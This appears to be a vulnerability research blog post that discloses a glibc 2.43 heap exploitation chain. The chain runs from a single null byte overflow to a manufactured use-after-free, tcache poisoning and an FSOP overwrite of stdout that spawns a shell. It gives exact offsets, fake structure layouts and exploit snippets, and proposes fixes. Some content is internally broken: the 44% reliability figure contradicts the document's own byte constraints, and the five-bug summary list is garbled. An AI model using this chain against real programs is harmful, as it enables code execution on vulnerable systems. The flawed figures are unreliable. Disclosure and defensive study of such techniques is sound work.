The starting position.
A single null byte. No use-after-free in the target. No double-free. Every mitigation the toolchain offers, Full RELRO, stack canary, NX, PIE, all active. That is the starting position.
This post documents a heap exploitation technique we are calling Schrödinger's Chunk. The name captures the core primitive: a chunk that exists simultaneously in two states, allocated from the program's perspective, freed from the allocator's perspective. We manufacture this condition from nothing by chaining five bugs in glibc 2.43's own allocator code. The target program is correct. The bugs are in glibc.
The canonical entry point is a null byte overflow. But Schrödinger's Chunk is not tied to one primitive. Any corruption that creates overlapping chunk views, including uncontrolled out of bounds writes, weak single byte overwrites, or partial size corruptions, can serve as the entry point. We cover the full range of applicable primitives in a dedicated section before walking through the canonical exploit chain.
Every claim here is verified against the glibc 2.43.9000 source. All five bugs were reported to the glibc security team prior to this publication.
What changed in glibc 2.43.
Understanding Schrödinger's Chunk requires understanding glibc 2.43 specifically. Several changes in this release shifted the attack surface in ways that are not immediately obvious.
Fastbins removed
glibc 2.43 removed fastbins entirely. Everything small now flows through
either the tcache (fast path) or the full consolidation machinery
(_int_free_merge_chunk). There is no middle
layer. This makes the tcache the sole fast allocation path for small
chunks. Any bug in the tcache now affects a much larger fraction of all
program allocations.
Tcache expanded to 76 bins
The tcache grew from 64 size classes (up to 0x410)
to 76: 64 small bins plus 12 large bins.
TCACHE_SMALL_BINS = 64,
TCACHE_LARGE_BINS = 12,
TCACHE_MAX_BINS = 76. The
tcache_perthread_struct expanded accordingly.
It now holds uint16_t num_slots[76] (152 bytes)
and tcache_entry *entries[76] (608 bytes),
totaling 760 bytes.
Lazy tcache initialization
This is the structurally important change. In glibc
2.35 the tcache_perthread_struct was allocated
during the first malloc(). In glibc 2.43 it is
allocated lazily, during the first free(). The
trigger in __libc_free is:
if (__glibc_unlikely (tcache_inactive ()))
return tcache_free_init (mem);
tcache_free_init calls
tcache_init(NULL) (which calls
__libc_malloc2 to allocate the struct) and then
re-calls __libc_free on the original chunk. The
heap layout consequence is deterministic:
Early init (glibc 2.35):
first malloc() → allocate tcache struct → allocate requested chunk
Lazy init (glibc 2.43):
malloc() #1 → allocate chunk directly (no tcache yet)
free() #1 → allocate tcache struct via tcache_free_init → re-free chunk
Resulting layout:
heap_base + 0x000: first malloc chunk (e.g. 0x20 for malloc(1))
heap_base + 0x020: tcache_perthread (0x310)
heap_base + 0x330: second malloc chunk
Given any heap address leak, the address of every subsequent allocation is computable by arithmetic. This has a direct consequence for safe-linking.
Relaxed tcache free path
In __libc_free, when a freed chunk is
tcache-eligible, glibc 2.43 takes an early return directly to
tcache_put after only two checks: pointer
alignment and tcache eligibility by size. The
check_inuse_chunk call that existed on the
tcache path in prior versions is gone. The size field is accepted as is
as long as it falls within a valid tcache bin range. This is how size
field corruption becomes exploitable on this version.
The allocator's bookkeeping.
Before diving into the bugs, here is the allocator state we are working with.
Chunks
Every heap allocation is a chunk. The header lives immediately before the user pointer and contains two 8 byte fields:
chunk_ptr
│
▼
┌───────────────────┐ ← chunk header
│ prev_size (8B) │ only valid when prev chunk is free
├───────────────────┤
│ size (8B) │ total chunk size | flags in low 3 bits
├───────────────────┤ ← user pointer (what malloc returns)
│ │
│ user data │
│ │
└───────────────────┘
Bit 0 of size is
PREV_INUSE: 1 means the preceding chunk is
allocated, 0 means it is free. When PREV_INUSE
is 0, prev_size is valid and tells the
allocator how far back to walk to find the free predecessor.
Tcache
typedef struct tcache_entry {
struct tcache_entry *next; // safe-linked pointer to next free chunk
uintptr_t key; // double-free detection token
} tcache_entry;
num_slots[i] in
tcache_perthread_struct counts how many
additional entries bin i can still accept. It
starts at mp_.tcache_count (default 7) for an
empty bin. Each free to tcache decrements it. Each allocation from
tcache increments it. The guard in __libc_free
for accepting a chunk into tcache is
num_slots[tc_idx] != 0.
Safe-linking
Since glibc 2.32, tcache next pointers are
stored encoded:
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
PROTECT_PTR(pos, ptr) computes
(pos >> 12) ^ ptr. The
pos >> 12 component is the XOR key,
derived from the pointer's own storage address. Because ASLR operates
at page granularity (12 bits), this key contains only the randomized
bits. Without knowing the storage address, you cannot compute the key
to forge a next pointer. In theory.
Five bugs in glibc 2.43.
We identified five defects in glibc 2.43's tcache implementation. Here they are in summary before showing how they connect.
tcache_put_n nor
tcache_get_n checks whether the list
contains a cycle. A chunk whose next field
decodes back to itself creates an infinite list. Every pop returns
the same address. This is the foundation of Schrödinger's Chunk.
num_slots is a
uint16_t. The logical maximum is 7. The
increment in tcache_get_n has no bounds
check. After two pops from a self-referencing loop the value
reaches 8. The capacity guard
(num_slots != 0) keeps accepting frees
that should be rejected.
tcache_get_n
unconditionally clears e->key = 0 on
every pop. After our double pop, key is 0.
tcache_key is non-zero. Stage 1 fails.
Stage 2 never runs.
free(), and the first
malloc() always lands at heap base, the
layout is fixed. The safe-linking key for any chunk is
addr >> 12. Pure arithmetic. No
freed memory read needed.
next fields use
PROTECT_PTR. The
entries[idx] head pointers in
tcache_perthread_struct are stored raw.
Any primitive reaching the tcache struct can redirect a bin head
without computing a safe-linking key.
Bug 1 in detail
tcache_put_n prepends a new chunk to its bin
and decrements num_slots.
tcache_get_n pops the head and increments
num_slots. Neither function checks whether the
linked list contains a cycle.
e->next = PROTECT_PTR (&e->next, *ep); // store safe-linked next
*ep = e; // set as new head (raw, no PROTECT_PTR)
--(tcache->num_slots[tc_idx]);
*ep = REVEAL_PTR (e->next); // advance head
++(tcache->num_slots[tc_idx]);
e->key = 0;
return (void *) e;
Neither operation checks whether the chunk being inserted is already
present in the list, or whether following next
pointers from the new head eventually reaches NULL. A chunk whose
next field decodes back to itself creates an
infinite list. Without the ability to create a cycle, we cannot get
malloc to return the same address twice. No
duplicate address means no two independent handles to the same memory.
No two handles means no manufactured UAF.
Bug 3 in detail
glibc's double-free detection uses two stages.
Stage 1 (fast gate) in __libc_free
if (__glibc_unlikely (e->key == tcache_key))
return tcache_double_free_verify (e);
Stage 2 (list walk) in tcache_double_free_verify
for (size_t tc_idx = 0; tc_idx < TCACHE_MAX_BINS; ++tc_idx) {
size_t cnt = 0;
for (tmp = tcache->entries[tc_idx]; tmp;
tmp = REVEAL_PTR(tmp->next), ++cnt) {
if (cnt >= mp_.tcache_count)
malloc_printerr ("free(): too many chunks detected in tcache");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
}
}
The list walk scans every tcache bin for the chunk being freed. With a
self-referencing loop, tmp would equal
e on the very first iteration. Stage 2 would
catch it immediately.
But Stage 2 only runs if Stage 1 passes. The problem is what
tcache_get_n does on every pop:
e->key = 0. The key is unconditionally
cleared on every allocation. After our double pop from the
self-referencing loop, the chunk's key is 0.
When we re-free the chunk, the Stage 1 check evaluates
(0 == tcache_key) as false. Stage 2
never runs. The list walk that would have caught the
double-free does not execute.
Entry points and primitives.
Schrödinger's Chunk requires one thing from the bug in your target: an overlapping chunk, a situation where one live, program-visible handle and one allocator-visible free chunk reference the same physical memory. Once you have that, the rest of the chain (self-referencing loop, schr allocation, manufactured UAF, tcache poison) runs from glibc's own bugs.
Program view: "M is live, I can read and write through it."
Allocator view: "M is free, it is in a bin."
Reading through the program handle reads allocator metadata. Writing through it corrupts allocator metadata. Any corruption path that leaves these two views inconsistent is sufficient. The five glibc bugs do not care how the overlap was created.
Path A · Null byte overflow (canonical)
Bug class: off-by-one null byte write past a heap buffer.
Mechanism: the null byte at
buf[n] lands on byte 0 of the adjacent chunk's
size field, clearing
PREV_INUSE (bit 0). When that adjacent chunk is
freed, the allocator walks backward by
prev_size bytes, finds a fake free chunk we
constructed in our live buffer, passes the self-pointing unlink check,
and merges. The merged chunk goes into the unsorted bin, but our live
handle still covers that same memory.
Before:
┌──────────────────┬──────────────────┐
│ [prev] 0x510 │ [victim] 0x500 │
│ in use │ PREV_INUSE=1 │
└──────────────────┴──────────────────┘
After null byte at offset 0x508 (clears victim's PREV_INUSE):
┌──────────────────┬──────────────────┐
│ [prev] 0x510 │ [victim] 0x500 │
│ in use │ PREV_INUSE=0 ← │
└──────────────────┴──────────────────┘
After free(victim):
┌────────────────────────────────────────────────────────────┐
│ [merged] 0xA00 in unsorted bin │
│ │
│ prev handle still valid → overlap achieved │
└────────────────────────────────────────────────────────────┘
Path B · Uncontrolled out of bounds write
Bug class: an OOB write where the position is attacker controlled (or predictable) but the bytes written are not. Audio data, network payload echoes, timer values, or any structured host-provided content.
Mechanism: glibc 2.43's
__libc_free on the tcache path performs
essentially no size field validation. If we can corrupt the low byte of
an adjacent chunk's size field, we can make the
allocator believe the chunk is a different size than it actually is. We
then free that chunk and it enters the wrong tcache bin. When we
reclaim from that bin we get a chunk that is "larger" than the actual
allocation, overlapping the chunk after it.
Path C · Controlled single byte write
Bug class: an arbitrary single byte write, one byte, attacker chosen value, attacker chosen address.
With one controlled byte you can write any value to byte 0 of a target
chunk's size field. This gives full control
over the low byte, allowing deterministic corruption to a specific
larger size (e.g., 0x200 → 0x280). The rest of
the path is identical to Path B, but without probability uncertainty.
This is the strongest single byte variant.
Path D · Multi-byte overflow with partial control
An overflow where some bytes are attacker controlled and others are not. The more bytes of control you have, the more flexibility you gain in choosing the target size class and the consolidation distance.
Path E · Use-after-free with write capability
A real UAF in the target program. With a dangling pointer to a freed chunk, creating the overlap is direct. Schrödinger's Chunk augments this path by enabling the self-referencing loop and the double-pop UAF manufacture, potentially turning a one-shot tcache poison into a persistent UAF primitive.
| Entry | Bytes controlled | Mechanism | Reliability |
|---|---|---|---|
| Null byte overflow | 0 (always \x00) |
PREV_INUSE clear → backward consolidation | Deterministic |
| Uncontrolled OOB | 0 (data dependent) | Size field corruption → wrong tcache bin | Retry based (~44%) |
| Controlled single byte | 1 byte, chosen | Size field corruption → wrong tcache bin | Deterministic |
| Multi-byte partial | Partial | Size + prev_size corruption | Varies |
| Real UAF | Full write to freed chunk | Direct tcache entry corruption | Depends on heap leak |
For all paths, once the overlap exists, Bugs 1 through 4 are the mechanism for manufacturing the use-after-free, defeating safe-linking without a freed memory read, and bypassing double-free detection. The entry point only determines how you get to the overlap. The downstream chain is the same.
The uncontrolled write case.
The uncontrolled case deserves deeper treatment because it is the most common class of real-world memory corruption. Many vulnerabilities in device emulators, network protocol handlers, and audio or video pipelines produce out of bounds writes where the attacker controls how many bytes overflow but not what they contain.
The question is: how do you reason about a corruption primitive when you do not know the bytes?
Frame it as a search problem
You need the corrupted low byte of the size field to satisfy:
byte & 0x0F == 0(16 byte alignment, mandatory)byte & 0x02 == 0(IS_MMAPPED clear, otherwise abort)byte != 0x00(zero means PREV_INUSE clear and size shrinks)- The resulting full size falls within a valid tcache bin range
Across the 256 possible byte values, roughly 112 (about 44%) satisfy all constraints and produce a valid tcache-eligible size. For a uniformly random byte, the probability per attempt is approximately 44%.
In practice, data is not uniformly random. For audio (u8 PCM silence
is 0x80), the distribution clusters around
0x80 = 0b10000000.
0x80 & 0x0F == 0 (aligned),
0x80 & 0x02 == 0 (not IS_MMAPPED). This is
a valid byte. For ALSA audio data during quiet periods, the dominant
byte value directly satisfies the constraints, making reliability very
high.
Retry loop structure
- Heap spray: build layout of repeated same size chunks.
- Create holes by freeing alternating chunks.
- Allocate overflowing buffer into a hole.
- Let overflow occur (one attempt).
- Check: did we get a useful size corruption? Try allocating from the expected target bin. If it returns a chunk that overlaps our spray region, success. If not, free the buffer, refill the hole, return to step 3.
- On success, proceed with the overlap.
The retry adds allocation noise. To prevent that noise from disrupting the heap layout, the spray and hole structure should be built with enough redundancy that a few failed attempts do not destroy the geometry.
Initial heap layout.
The technique begins with three allocations after program startup:
┌────────────────────────────────────────────────────────────────────────┐
│ heap_base + 0x000 │
├────────────────────────────────────────────────────────────────────────┤
│ [taste] 0x20 ← first malloc() before tcache exists │
├────────────────────────────────────────────────────────────────────────┤
│ [tcache] 0x310 ← allocated by tcache_free_init() on first free() │
│ │
│ num_slots[i] = 7 for all i (mp_.tcache_count, all slots available) │
│ entries[i] = NULL for all i │
├────────────────────────────────────────────────────────────────────────┤
│ [prev] 0x510 ← source of the null byte overflow (0x508 usable) │
├────────────────────────────────────────────────────────────────────────┤
│ [victim] 0x500 ← consolidation target │
├────────────────────────────────────────────────────────────────────────┤
│ [barrier] 0x90 ← prevents top-chunk merge when victim is freed │
├────────────────────────────────────────────────────────────────────────┤
│ [top] ... │
└────────────────────────────────────────────────────────────────────────┘
The layout is deterministic (Bug 4).
prev's user pointer is
heap_base + 0x330. We know this from the heap
leak alone. No UAF needed, no guessing.
The null byte primitive: writing 0x508 bytes to
prev and appending a null terminator writes
\x00 at
prev_user + 0x508. This address is exactly byte
0 of victim's size
field. Since PREV_INUSE is bit 0 of
size, this single null byte clears it.
Phase 1 · Backward consolidation.
Clearing PREV_INUSE on victim tells the
allocator the preceding chunk is free when victim is freed. We need
four things to be true for the consolidation to proceed without
crashing.
victim->prev_sizemust point back to a valid fake chunk- That fake chunk must have a consistent
sizefield - The unlink integrity check (
fd->bk == p && bk->fd == p) must pass - The size consistency checks must pass
We satisfy all four by writing into prev's data area:
offset value meaning
───────────────────────────────────────────────────────────
+0x00 (any) fake chunk's prev_size (not checked)
+0x08 0x501 fake chunk's size: 0x500 | PREV_INUSE=1
+0x10 prev_user fake fd = self
+0x18 prev_user fake bk = self
... (any)
+0x500 0x500 victim's prev_size field
+0x508 \x00 ← null byte clears victim's PREV_INUSE
The fake chunk's chunk pointer is
prev_user. We treat
prev_user + 0x00 as
prev_size and
prev_user + 0x08 as
size. Its size is 0x500.
Unlink check
(fd->bk == p && bk->fd == p):
with fd = bk = prev_user = p, both checks
become p->bk == p and
p->fd == p. True. The unlink runs and is a
harmless no-op.
Size consistency checks in
unlink_chunk and
_int_free_merge_chunk both pass because
chunksize(fake) = 0x500 equals
victim->prev_size = 0x500.
When victim is freed, _int_free_merge_chunk runs:
Step 1: victim->size has PREV_INUSE=0 ← cleared by null byte
Step 2: read victim->prev_size = 0x500
Step 3: p = chunk_at_offset(victim, -0x500) = prev_user
Step 4: chunksize(fake) == prevsize → 0x500 == 0x500 ✓ no abort
Step 5: unlink_chunk(fake) → self-pointing passes check ✓ no-op
Step 6: merged chunk at prev_user, size 0x500+0x500=0xA00
Step 7: insert into unsorted bin
The result:
Memory at prev_user (post-consolidation):
┌──────────────────────────────────────────────────────────────┐
│ merged chunk (0xA00) · in unsorted bin │
│ │
│ prev_user+0x00: prev_size │
│ prev_user+0x08: size = 0xA01 (PREV_INUSE set) │
│ prev_user+0x10: fd → main_arena+0x08 ← libc pointer │
│ prev_user+0x18: bk → main_arena+0x08 │
│ ... │
└──────────────────────────────────────────────────────────────┘
▲
│ prev entry in program's tracking table still points here
│ program believes prev is a live 0x508-byte allocation
│ we can read and write through it
Overlap established. The allocator owns this memory
as a free chunk. The program thinks
prev is a live allocation.
Phase 2 · Libc leak.
The merged chunk is the only entry in the unsorted bin. The unsorted
bin is a circular doubly linked list rooted in
main_arena. A lone entry has
fd = bk = main_arena + 0x08. These pointers
sit at prev_user + 0x10 and
prev_user + 0x18, inside our overlap region.
data = show(prev)
unsorted_fd = unpack64(data[0x10:0x18])
libc_base = unsorted_fd - (main_arena_offset + 0x08)
Libc base acquired. No additional primitive required.
Phase 3 · Self-referencing tcache loop.
We carve a small chunk from the merged region:
malloc(0x88) carved from merged chunk:
E at prev_user + 0x10 (unsorted bin allocates from the front)
After free(E):
tcache[0x90]: head → E
E->next = PROTECT_PTR(&E->next, NULL) = E_user >> 12
num_slots[0x90] = 6
Now Bug 4: the layout is deterministic, so we know
E_user = prev_user + 0x10. We compute:
safe_key = E_user >> 12
self_loop = safe_key ^ E_user # = PROTECT_PTR(E_user, E_user)
No reading from freed memory. Pure arithmetic.
Through the overlap we overwrite E->next
(at prev_user + 0x10) with
self_loop:
# E_user = prev_user + 0x10
# E->next field is at E_user + 0x00 = prev_user + 0x10
struct.pack_into("<Q", overlap_buf, 0x10, self_loop)
edit(prev, overlap_buf)
Verification:
REVEAL_PTR(E->next)
= PROTECT_PTR(&E->next, E->next)
= (E_user >> 12) ^ ((E_user >> 12) ^ E_user)
= E_user ← loop back to E
The bin head never advances:
tcache[0x90]:
head
│
▼
┌──────────────┐
│ E │
│ next ───────┼──► (decodes to E_user)
└──────────────┘
▲ │
└────┘
∞
Every pop returns E_user. The list is infinite.
Phase 4 · Schr allocation.
Two consecutive pops from the infinite bin:
A = malloc(0x88) # returns E_user
B = malloc(0x88) # returns E_user again
The program's tracking table now has:
┌─────────────────────────────────────────────────────────────┐
│ tracking_table[A]: data = E_user, in_use = 1 │
│ tracking_table[B]: data = E_user, in_use = 1 │
│ ▲ │
│ └── same physical memory │
└─────────────────────────────────────────────────────────────┘
Two independent entries. One chunk. And the
num_slots overflow:
Initial state: num_slots[0x90] = 7
After free(E): num_slots[0x90] = 6
After pop A: num_slots[0x90] = 7
After pop B: num_slots[0x90] = 8 ← exceeds mp_.tcache_count
The counter now claims there are 8 available slots. The logical maximum is 7. No bounds check prevented this (Bug 2). The inflated count will shortly allow a free to go through that should be rejected.
Phase 5 · Manufacturing the use-after-free.
Current state:
tracking_table[A]: data = E_user, in_use = 1
tracking_table[B]: data = E_user, in_use = 1
tcache[0x90]: head → E → E → E → ... (self-loop)
E->key = 0 ← cleared by both pops in tcache_get_n
We free A:
free(tracking_table[A].data):
p = E_user
e = (tcache_entry *) E_user
Stage 1 gate: (e->key == tcache_key)
= (0 == random_nonzero)
= false ← Bug 3 bypasses Stage 2
tcache_double_free_verify: NEVER CALLED
Guard: (num_slots[0x90] != 0) = (8 != 0) = true ← Bug 2 enables this
tcache_put(E):
e->key = tcache_key (chunk marked as in-tcache)
E->next = PROTECT_PTR(E, head) (points to current head = E_user)
head = E_user
num_slots[0x90] = 7
tracking_table[A]: data = NULL, in_use = 0 ← program cleans up A
tracking_table[B]: data = E_user, in_use = 1 ← B untouched
The state after free(A):
Physical memory at E_user:
┌────────────────────────────────────────────────────────────┐
│ Allocator view: tcache[0x90] head → THIS chunk │
│ E->next = some encoded pointer │
│ E->key = tcache_key │
│ │
│ Program view (through tracking_table[B]): │
│ "live allocation at E_user" │
│ write(B, data) → writes to E_user → WRITES TO FREED │
│ TCACHE METADATA │
└────────────────────────────────────────────────────────────┘
The chunk is simultaneously:
Freed. The allocator sees it at the head of tcache[0x90].
Live. The program sees it as a valid allocation through handle B.
Writing through B is a use-after-free. The target program has no UAF bug. This primitive was manufactured entirely from three glibc bugs interacting:
| Bug | Role |
|---|---|
| Bug 1 — no cycle detection | Created the self-referencing loop → two handles |
| Bug 2 — no count bound | num_slots = 8, allowed the re-free to pass the capacity guard |
| Bug 3 — key clearing defeats gate | e->key = 0, Stage 1 gate failed, Stage 2 list walk never ran |
None of them alone is sufficient. Each is load-bearing.
Phase 6 · Tcache poisoning and arbitrary allocation.
Through handle B we write to E_user,
overwriting E->next in the freed chunk:
target = tracking_table_addr # program's allocation array in BSS
safe_key = E_user >> 12 # computed, no read needed (Bug 4)
poison = safe_key ^ target # PROTECT_PTR(E_user, target)
write(B): E->next = poison
The tcache chain for bin 0x90 now reads:
tcache[0x90]:
head → E_user → tracking_table → ???
Two more pops:
malloc(0x88) # returns E_user (discard — this is the freed chunk)
malloc(0x88) # returns tracking_table ← ARBITRARY ALLOCATION
We hold an allocation overlapping the program's own bookkeeping. By editing this allocation we can redirect any entry's data pointer to any address. Full arbitrary read and write.
┌─────────────────────────────────────────────────────────────────┐
│ tracking_table (BSS) ← we have an allocation here │
│ │
│ entry[0]: data ptr ←── WE WRITE THIS to any target address │
│ size ←── and this │
│ in_use = 1 │
│ entry[1]: ... │
│ │
│ Point entry[0].data to any address → read/write via show/edit │
└─────────────────────────────────────────────────────────────────┘
Phase 7 · FSOP to shell.
Full RELRO eliminates GOT overwrites. The target is
stdout's _IO_FILE
structure in libc's data segment.
Since glibc 2.24, the regular vtable pointer in
_IO_FILE_plus (at
+0xd8) is range-validated against
__libc_IO_vtables on every I/O operation.
Pointing it outside this range causes an abort.
However, the wide character vtable,
_wide_data->_wide_vtable, has no range
check. _IO_wide_data is pointed to by
stdout->_wide_data (at
+0xa0). Inside
_IO_wide_data,
_wide_vtable lives at
+0xe0. This field dispatches to
__doallocate (at +0x68
in _IO_jump_t) when the wide character buffer
needs initialization. No validation ever touches it.
printf("prompt")
│
▼ stdout->vtable = _IO_wfile_jumps (legitimate — passes range check)
│
▼ _IO_wfile_xsputn → _IO_wfile_overflow
│ (wide buffer is NULL, needs allocation)
│
▼ _IO_wdoallocbuf
│
▼ fp->_wide_data->_wide_vtable->__doallocate(fp)
│ ▲ NOT range-checked
│
▼ our controlled function pointer
│
▼ shell
We build fake structures in the overlap region at known addresses (deterministic layout, Bug 4):
prev_user + 0x100: fake _IO_lock_t
┌─────────────────┐
│ 16 bytes zero │ ← "unlocked" state for the stdio lock
└─────────────────┘
prev_user + 0x200: fake _IO_wide_data
┌──────────────────────────────────────────────────┐
│ ... │
│ +0xe0: _wide_vtable ptr → prev_user + 0x300 │
└──────────────────────────────────────────────────┘
prev_user + 0x300: fake _IO_jump_t (wide vtable)
┌──────────────────────────────────────────────────┐
│ ... │
│ +0x68: __doallocate → win() │
└──────────────────────────────────────────────────┘
Four writes into stdout via the arbitrary
write primitive:
| stdout field | offset | value written |
|---|---|---|
_flags |
+0x00 |
0xFBAD2000 — clears _IO_UNBUFFERED, enables wide path |
_lock |
+0x88 |
prev_user + 0x100 — our zeroed fake lock |
_wide_data |
+0xa0 |
prev_user + 0x200 — our fake _IO_wide_data |
vtable |
+0xd8 |
_IO_wfile_jumps — legitimate, passes range check, triggers dispatch |
The vtable write is the trigger. The next
printf dispatches through
_IO_wfile_jumps, reaches
_IO_wdoallocbuf, reads
stdout->_wide_data->_wide_vtable->__doallocate,
finds our controlled pointer, and calls it.
Shell.
The full chain.
off-by-one null byte
│
▼ fake chunk (fd=bk=self, size=0x501)
│ all integrity checks satisfied
▼ PREV_INUSE cleared on victim
│
▼ _int_free_merge_chunk: backward consolidation
merged chunk 0xA00 at prev_user → unsorted bin
│
▼ overlap: prev handle over free merged chunk
read unsorted bin fd → libc base
│
▼ carve E from overlap, free to tcache
Bug 4 (lazy init): E_user computable → safe_key known
write PROTECT_PTR(E,E) to E->next through overlap
Bug 1 (no cycle detection): tcache[0x90] = E→E→E→...
│
▼ double pop: A=E_user, B=E_user
Bug 2 (no count bound): num_slots = 8, exceeds max
│
▼ free(A): re-free E_user
Bug 3 (key clearing bypasses gate): verify skipped
Bug 2 (inflated count): tcache_put accepted
write(B): UAF write to freed tcache metadata
│
▼ tcache poison: E->next → tracking_table
two pops → arbitrary allocation at tracking_table
│
▼ arbitrary R/W via tracking_table overlay
│
▼ FSOP: corrupt stdout
_flags, _lock, _wide_data, vtable
fake _IO_wide_data → fake _wide_vtable
__doallocate (+0x68) → win()
│
▼ shell
What makes this different.
Null byte poisoning and PREV_INUSE tricks produce chunk overlap and apply tcache poisoning from that overlap. They still need to read freed memory to recover the safe-linking key. One shot. Fixed geometry.
Synthesizes a genuine use-after-free from a program that has none. The manufactured UAF is a persistent read/write handle to freed memory, independent of the overlap region. Safe-linking key recovery is eliminated entirely. Bug 4 makes the key a function of heap base alone.
Three of the five bugs (1, 2, 3) interact tightly:
- Bug 1 without Bug 2: the loop exists but the inflated
num_slotsis absent, and the re-free may be rejected by the capacity guard. - Bug 1 without Bug 3: the loop exists, but Stage 2 of double-free detection finds E in the list on the first scan iteration and aborts.
- Bug 3 without Bug 1: the detection gate is bypassable only because the key was cleared by the pop, which only happened because the loop returned E twice.
The chain is multiplicative. Each bug is load-bearing.
Bug summary and proposed fixes.
| # | Location | Defect | Proposed fix |
|---|---|---|---|
| 1 | tcache_put_ntcache_get_n |
No cycle detection in tcache freelist | Check in tcache_put that the new entry address differs from any existing entry. Or in tcache_get, verify the returned address differs from the previous return. |
| 2 | tcache_get_n |
num_slots++ has no upper bound |
Clamp to mp_.tcache_count on every increment. |
| 3 | tcache_get_n__libc_free |
e->key = 0 on every pop defeats the double-free gate |
Remove the key based gate and always walk the list. Or defer key clearing until re-free rather than on pop. |
| 4 | tcache_free_inittcache_init |
Lazy init creates a fully deterministic heap layout | Add randomized padding before tcache struct allocation to break layout determinism. |
| 5 | tcache_put_n |
entries[] head pointers stored raw while next fields use PROTECT_PTR |
Apply PROTECT_PTR consistently to head pointer assignments in the non-mangled path. |
Conclusion.
Schrödinger's Chunk demonstrates that the heap exploitation landscape on modern glibc is not settled. A performance optimization (lazy tcache init) made safe-linking keys computable. Removing one allocation path (fastbins) concentrated all small-chunk traffic onto a path with five linked defects. A single null byte is enough to start the chain. A program with no UAF, no double-free, and every compiler mitigation active ends with a shell.
The five bugs were reported to the glibc security team prior to this publication.